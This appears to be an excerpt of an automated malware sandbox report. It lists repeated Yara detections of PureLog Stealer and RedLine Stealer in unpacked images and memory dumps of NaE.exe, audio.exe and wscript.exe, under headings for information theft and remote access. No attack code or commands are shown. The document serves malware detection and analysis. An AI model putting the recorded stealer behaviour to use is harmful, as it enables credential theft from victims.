                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTR

                        Stealing of Sensitive Information

                        barindex
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: 4.2.NaE.exe.35083c0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.0.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.wscript.exe.27d83495000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.0.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.wscript.exe.27d83f5a630.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.NaE.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.wscript.exe.27d83495000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000003.1400639939.0000027D83495000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1404488524.0000027D83ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461555095.0000000003508000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NaE.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\audio.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3485f90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.26a0000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.audio.exe.73ed50.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21023f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f5570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.36f6478.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.NaE.exe.782700.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21223f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.3715f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.34e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60f08.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21623f6.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3465570.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.3505f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.3605f90.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e23f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.22d0f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.21614ee.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.21e14ee.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.21214ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310f08.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.35e6478.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.3466478.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.2620000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.audio.exe.6dfc80.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
